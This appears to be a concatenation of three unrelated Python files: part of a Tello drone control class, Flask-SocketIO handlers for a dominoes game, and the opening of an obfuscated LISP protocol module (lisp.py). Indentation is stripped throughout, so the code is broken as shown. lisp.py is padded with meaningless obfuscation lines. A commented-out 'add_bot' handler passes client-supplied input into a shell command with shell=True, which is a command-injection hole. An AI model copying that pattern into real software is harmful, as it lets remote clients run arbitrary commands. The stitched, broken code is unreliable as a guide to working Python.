direction (str): Direction to flip, 'l', 'r', 'f', 'b'.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('flip %s' % direction)
def get_response(self):
"""
Returns response of tello.
Returns:
int: response of tello.
"""
response = self.response
return response
def get_height(self):
"""Returns height(dm) of tello.
Returns:
int: Height(dm) of tello.
"""
height = self.send_command('height?')
height = str(height)
height = filter(str.isdigit, height)
try:
height = int(height)
self.last_height = height
except:
height = self.last_height
pass
return height
def get_battery(self):
"""Returns percent battery life remaining.
Returns:
int: Percent battery life remaining.
"""
battery = self.send_command('battery?')
try:
battery = int(battery)
except:
pass
return battery
def get_flight_time(self):
"""Returns the number of seconds elapsed during flight.
Returns:
int: Seconds elapsed during flight.
"""
flight_time = self.send_command('time?')
try:
flight_time = int(flight_time)
except:
pass
return flight_time
def get_speed(self):
"""Returns the current speed.
Returns:
int: Current speed in KPH or MPH.
"""
speed = self.send_command('speed?')
try:
speed = float(speed)
if self.imperial is True:
speed = round((speed / 44.704), 1)
else:
speed = round((speed / 27.7778), 1)
except:
pass
return speed
def land(self):
"""Initiates landing.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('land')
def move(self, direction, distance):
"""Moves in a direction for a distance.
This method expects meters or feet. The Tello API expects distances
from 20 to 500 centimeters.
Metric: .02 to 5 meters
Imperial: .7 to 16.4 feet
Args:
direction (str): Direction to move, 'forward', 'back', 'right' or 'left'.
distance (int|float): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
distance = float(distance)
if self.imperial is True:
distance = int(round(distance * 30.48))
else:
distance = int(round(distance * 100))
return self.send_command('%s %s' % (direction, distance))
def move_backward(self, distance):
"""Moves backward for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('back', distance)
def move_down(self, distance):
"""Moves down for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('down', distance)
def move_forward(self, distance):
"""Moves forward for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('forward', distance)
def move_left(self, distance):
"""Moves left for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('left', distance)
def move_right(self, distance):
"""Moves right for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
"""
return self.move('right', distance)
def move_up(self, distance):
"""Moves up for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('up', distance)
|
socketio_handlers.py | """Flask-SocketIO handlers and utility functions"""
import random, time, subprocess
from flask import request
from flask_socketio import send, emit#, join_room, leave_room
from dominos.Engine import Engine
from dominos import socketio
"""Settings"""
parsed_args = {}
keep_client_order = True
class RoomTracker:
def __init__(self):
self.game_rooms = {}
self.sids_to_rooms = {}
rt = RoomTracker()
rt.game_rooms[1] = {"clients": {}, "observers": {}, "started": False}
"""Run Flask-SocketIO, potentially changing settings"""
def run_socketio(app, host, keep_order=None, cmd_args=None):
# if keep_order is not None:
# global keep_client_order
# keep_client_order = keep_order
# if cmd_args is not None:
# global parsed_args
# parsed_args = cmd_args
socketio.run(app, host=host)
"""Utility Functions"""
# def get_id_from_sid(sid):
# room = rt.sids_to_rooms[sid]
# for c in rt.game_rooms[room]["clients"]:
# if rt.game_rooms[room]["clients"][c]["sid"] == sid:
# return c
# raise ValueError("Invalid sid request")
# def broadcast_to_room(room):
# def broadcast(msg, tag=None):
# """Send a message to all clients."""
# clear_old_info(room)
# if tag is None:
# socketio.send(msg, room=room)
# else:
# for client in rt.game_rooms[room]["clients"]:
# emit_to_client_in_room(room)(msg, client, tag, clear=False)
# return broadcast
# def emit_to_client_in_room(room):
# def emit_to_client(msg, client_id, tag=None, clear=True):
# # Clear response before whispering, to ensure we don't keep a stale one
# if clear:
# rt.game_rooms[room]["clients"][client_id]["response"] = "No response"
# if tag is None:
# socketio.send(msg, room=rt.game_rooms[room]["clients"][client_id]["sid"])
# else:
# emit(tag, msg, room=rt.game_rooms[room]["clients"][client_id]["sid"])
# return emit_to_client
# def retrieve_response_in_room(room):
# def retrieve_response(client_id):
# """Get the current stored response corresponding to the requested client."""
# return rt.game_rooms[room]["clients"][client_id]["response"]
# return retrieve_response
# def clear_old_info(room, specific_client=None):
# # Erase outdated info
# for client in ([specific_client] if specific_client is not None else rt.game_rooms[room]["clients"]):
# emit_to_client_in_room(room)("", client, "error")
# emit_to_client_in_room(room)("", client, "prompt")
"""SocketIO Handlers"""
# @socketio.on('join_room')
# def on_join(room):
# if room not in rt.game_rooms:
# rt.game_rooms[room] = {"clients": {}, "observers": {}, "started": False}
# join_room(room)
# new_index = max(rt.game_rooms[room]["clients"].keys()) + 1 if len(rt.game_rooms[room]["clients"]) > 0 else 0
# rt.game_rooms[room]["clients"][new_index] = {"sid": request.sid, "response": "No response", "ai": False}
# rt.sids_to_rooms[request.sid] = room
# send("A new player has joined room {}!".format(room), room=room)
# @socketio.on('leave_room')
# def on_leave(room):
# leave_room(room)
# send("A player has left room {}!".format(room), room=room)
# @socketio.on('connect')
# def on_connect():
# # new_index = max(clients.keys()) + 1 if len(clients) > 0 else 0
# # clients[new_index] = {"sid": request.sid, "response": "No response", "ai": False}
# print("Client connected")
# # print(clients)
# @socketio.on('ai_connect')
# def mark_as_ai():
# room = rt.sids_to_rooms[request.sid]
# for c in rt.game_rooms[room]["clients"]:
# if rt.game_rooms[room]["clients"][c]["sid"] == request.sid:
# rt.game_rooms[room]["clients"][c]["ai"] = True
# print("Marked {} as AI".format(c))
# break
# else:
# raise Exception("Didn't mark as AI, probably executed AI connect before joining room was completed")
# @socketio.on('observer_connect')
# def mark_as_observer(room):
# rt.sids_to_rooms[request.sid] = room
# rt.game_rooms[room]["observers"][request.sid] = {}
# @socketio.on('start_observer')
# def start_as_observer(n_agents):
# print(f"Waiting for {n_agents} agents to connect before starting...")
# # Need to check here not for the number of clients, but for the number of AI, so that we give enough time
# # to mark AIs as AI, so that we send them AI-compatible messages. Setting sleep to something low (e.g. 0.0001)
# # and not waiting for us to mark them as AI will result in us treating them like humans,
# # And so the agents never respond since we don't send them the correct messages.
# # Will need to change this a bit if we want to allow human players to mix with Scheduler,
# # Since this assumes all players from Scheduler are AIs
# room = rt.sids_to_rooms[request.sid]
# while len([c for c in rt.game_rooms[room]["clients"] if rt.game_rooms[room]["clients"][c]["ai"]]) < n_agents:
# time.sleep(0.001)
# pass
# on_start(room)
# @socketio.on('disconnect')
# def on_disconnect():
# # try:
# # del game_rooms[room]["clients"][get_id_from_sid(request.sid)]
# print("Client disconnected")
# # except ValueError:
# # del game_rooms[room]["observers"][request.sid]
# # print("Observers disconnected")
@socketio.on('start_game')
def on_start():
room = 1
if not rt.game_rooms[room]["started"]: # Don't allow multiple starts
print("starting")
rt.game_rooms[room]["started"] = True
broadcast_to_room(room)("", "game_start")
clients_keys = list(rt.game_rooms[room]["clients"].keys())
random_keys = [i for i in range(len(rt.game_rooms[room]["clients"]))]
if not keep_client_order:
random.shuffle(random_keys)
shuffled_clients = {}
for i, k in enumerate(random_keys):
shuffled_clients[k] = rt.game_rooms[room]["clients"][clients_keys[i]]
rt.game_rooms[room]["clients"] = shuffled_clients
winner = Engine(emit_to_client_in_room(room), broadcast_to_room(room), retrieve_response_in_room(room),
n_players=len(rt.game_rooms[room]["clients"])).run_game()
socketio.stop()
@socketio.on('response')
def store_response(message):
room = 1
sender_id = get_id_from_sid(request.sid)
print("Got a response from player {}: ".format(sender_id) + message)
clear_old_info(room, sender_id)
rt.game_rooms[room]["clients"][sender_id]["response"] = message
#################
#################
#################
#################
#################
def get_id_from_sid(sid):
room = 1
for c in rt.game_rooms[room]["clients"]:
if rt.game_rooms[room]["clients"][c]["sid"] == sid:
return c
raise ValueError("Invalid sid request")
def broadcast_to_room(room):
def broadcast(msg, tag=None):
"""Send a message to all clients."""
clear_old_info(room)
if tag is None:
socketio.send(msg, room=room)
else:
for client in rt.game_rooms[room]["clients"]:
emit_to_client_in_room(room)(msg, client, tag, clear=False)
return broadcast
def emit_to_client_in_room(room):
def emit_to_client(msg, client_id, tag=None, clear=True):
# Clear response before whispering, to ensure we don't keep a stale one
if clear:
rt.game_rooms[room]["clients"][client_id]["response"] = "No response"
if tag is None:
socketio.send(msg, room=rt.game_rooms[room]["clients"][client_id]["sid"])
else:
emit(tag, msg, room=rt.game_rooms[room]["clients"][client_id]["sid"])
return emit_to_client
def retrieve_response_in_room(room):
def retrieve_response(client_id):
"""Get the current stored response corresponding to the requested client."""
return rt.game_rooms[room]["clients"][client_id]["response"]
return retrieve_response
def clear_old_info(room, specific_client=None):
# Erase outdated info
for client in ([specific_client] if specific_client is not None else rt.game_rooms[room]["clients"]):
emit_to_client_in_room(room)("", client, "error")
emit_to_client_in_room(room)("", client, "prompt")
#################
#################
#################
#################
#################
# def whisper(msg, player, tag=None):
# socketio.emit(tag, msg, room=request.sid)
# def shout(msg, tag=None):
# socketio.emit(tag, msg)
@socketio.on('connect')
def test_connect():
print("Client connected")
new_index = max(rt.game_rooms[1]["clients"].keys()) + 1 if len(rt.game_rooms[1]["clients"]) > 0 else 0
rt.game_rooms[1]["clients"][new_index] = {"sid": request.sid, "response": "No response", "ai": False}
rt.sids_to_rooms[request.sid] = 1
@socketio.on('disconnect')
def test_disconnect():
room = 1
del rt.game_rooms[room]["clients"][get_id_from_sid(request.sid)]
print('Client disconnected')
# @socketio.on('start game')
# def on_start(passed_room=None):
# if passed_room is not None:
# room = passed_room
# else:
# room = rt.sids_to_rooms[request.sid]
# if not rt.game_rooms[room]["started"]: # Don't allow multiple starts
# print("Starting")
# broadcast_to_room(room)("", "start game")
# rt.game_rooms[room]["started"] = True
# # shuffle clients randomly
# clients_keys = list(rt.game_rooms[room]["clients"].keys())
# random_keys = [i for i in range(len(rt.game_rooms[room]["clients"]))]
# if not keep_client_order:
# random.shuffle(random_keys)
# shuffled_clients = {}
# for i, k in enumerate(random_keys):
# shuffled_clients[k] = rt.game_rooms[room]["clients"][clients_keys[i]]
# rt.game_rooms[room]["clients"] = shuffled_clients
# ai_players = [c for c in rt.game_rooms[room]["clients"] if rt.game_rooms[room]["clients"][c]["ai"]]
# print(rt.game_rooms[room]["clients"])
# engine = Engine(emit_to_client_in_room(room), broadcast_to_room(room), retrieve_response_in_room(room),
# nonlocal_ais=ai_players, n_players=len(rt.game_rooms[room]["clients"]), **parsed_args)
# winner = engine.run_game()
# socketio.stop()
# @socketio.on('action')
# def store_action(message):
# room = rt.sids_to_rooms[request.sid]
# sender_id = get_id_from_sid(request.sid)
# print("Got an action from player {}: ".format(sender_id) + message)
# clear_old_info(room, sender_id)
# rt.game_rooms[room]["clients"][sender_id]["response"] = message
# @socketio.on('add_bot')
# def add_bot(bot_type):
# room = rt.sids_to_rooms[request.sid]
# broadcast_to_room(room)(f"Adding {bot_type} to game", "info")
# def run_agent():
# try:
# subprocess.run(f"python3 ./coup/agents/{bot_type}.py {room}", shell=True, check=False)
# print('done')
# except BaseException:
# assert False
# pass
# # thread = threading.Thread(target=run_agent)
# thread = socketio.start_background_task(target=run_agent)
# # thread.start()
# thread.join()
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy . distance import vincenty
import curve25519
use_chacha = ( os . getenv ( "LISP_USE_CHACHA" ) != None )
use_poly = ( os . getenv ( "LISP_USE_POLY" ) != None )
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
lisp_print_rloc_probe_list = False
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
if 68 - 68: Ii1I / O0
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
lisp_map_notify_queue = { }
lisp_map_servers_list = { }
lisp_ddt_map_requestQ = { }
lisp_db_list = [ ]
lisp_group_mapping_list = { }
lisp_map_resolvers_list = { }
lisp_rtr_list = { }
lisp_elp_list = { }
lisp_rle_list = { }
lisp_geo_list = { }
lisp_json_list = { }
lisp_myrlocs = [ None , None , None ]
lisp_mymacs = { }
if 62 - 62: i11iIiiIii - II111iiii % I1Ii111 - iIii1I11I1II1 . I1ii11iIi11i . II111iiii
if 61 - 61: oO0o / OoOoOO00 / iII111i * OoO0O00 . II111iiii
if 1 - 1: II111iiii - I1ii11iIi11i % i11iIiiIii + IiII . I1Ii111
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
if 79 - 79: oO0o + I1Ii111 . ooOoO0o * IiII % I11i . I1IiiI
lisp_myinterfaces = { }
lisp_iid_to_interface = { }
lisp_multi_tenant_interfaces = [ ]
if 94 - 94: iII111i * Ii1I / IiII . i1IIi * iII111i
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
if 47 - 47: i1IIi % i11iIiiIii
if 20 - 20: ooOoO0o * II111iiii
if 65 - 65: o0oOOo0O0Ooo * iIii1I11I1II1 * ooOoO0o
if 18 - 18: iIii1I11I1II1 / I11i + oO0o / Oo0Ooo - II111iiii - I11i
lisp_registered_count = 0
if 1 - 1: I11i - OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
if 55 - 55: II111iiii
lisp_info_sources_by_address = { }
lisp_info_sources_by_nonce = { }
if 43 - 43: OoOoOO00 - i1IIi + I1Ii111 + Ii1I
if 17 - 17: o0oOOo0O0Ooo
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
lisp_crypto_keys_by_nonce = { }
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
lisp_data_plane_security = False
lisp_search_decap_keys = True
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
lisp_crypto_ephem_port = None
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
if 77 - 77: I11i - iIii1I11I1II1
lisp_pitr = False
if 82 - 82: i11iIiiIii . OOooOOo / Oo0Ooo * O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
lisp_l2_overlay = False
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
lisp_rloc_probing = False
lisp_rloc_probe_list = { }
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
lisp_register_all_rtrs = True
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
if 83 - 83: OoooooooOO
lisp_nonce_echoing = False
lisp_nonce_echo_list = { }
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
lisp_nat_traversal = False
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
if 58 - 58: i11iIiiIii % I11i
lisp_program_hardware = False
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
if 91 - 91: oO0o % Oo0Ooo
lisp_ipc_lock = None
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
lisp_default_iid = 0
lisp_default_secondary_iid = 0
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
lisp_ms_rtr_list = [ ]
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
if 13 - 13: OOooOOo / i11iIiiIii
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
lisp_nat_state_info = { }
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if 87 - 87: ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
lisp_last_map_request_sent = None
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
lisp_last_icmp_too_big_sent = 0
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = [ ]
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
lisp_policies = { }
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
if 33 - 33: I11i
lisp_load_split_pings = False
if 18 - 18: o0oOOo0O0Ooo % iII111i * O0
if 87 - 87: i11iIiiIii
if 93 - 93: I1ii11iIi11i - OoO0O00 % i11iIiiIii . iII111i / iII111i - I1Ii111
if 9 - 9: I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo
if 91 - 91: iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
lisp_eid_hashes = [ ]
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
lisp_reassembly_queue = { }
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
lisp_pubsub_cache = { }
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
lisp_decent_push_configured = False
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
lisp_ipc_socket = None
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
lisp_ms_encryption_keys = { }
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
if 7 - 7: IiII * I1Ii111 % Ii1I - o0oOOo0O0Ooo
if 13 - 13: Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
lisp_rtr_nat_trace_cache = { }
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
lisp_glean_mappings = [ ]
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
lisp_gleaned_groups = { }
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
if 19 - 19: I1IiiI
lisp_icmp_raw_socket = None
if ( os . getenv ( "LISP_SEND_ICMP_TOO_BIG" ) != None ) :
lisp_icmp_raw_socket = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_ICMP )
lisp_icmp_raw_socket . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
lisp_ignore_df_bit = ( os . getenv ( "LISP_IGNORE_DF_BIT" ) != None )
if 71 - 71: I1Ii111 . II111iiii
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
